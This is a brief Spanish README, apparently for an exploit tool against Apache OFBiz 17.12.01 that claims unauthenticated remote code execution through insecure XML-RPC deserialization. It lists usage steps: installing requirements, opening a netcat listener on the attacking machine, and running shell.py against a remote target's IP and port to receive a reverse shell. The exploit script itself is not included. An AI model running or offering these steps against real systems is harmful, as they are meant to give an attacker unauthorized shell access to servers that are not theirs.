
ApacheOfBiz 17.12.01 - Ejecución remota de código no autorizada
ApacheOfBiz 17.12.01 - Ejecución remota de código no autorizada
Las solicitudes XML-RPC son vulnerables a una deserialización insegura.
pip3 install -r requeriments.txt
nc -nlvp <port> # equipo atacante
python3 shell.py -i <remote IP> -p <remote port> -li <local IP> -lp <local port>
Deberías tener una shell en tu listener de nc
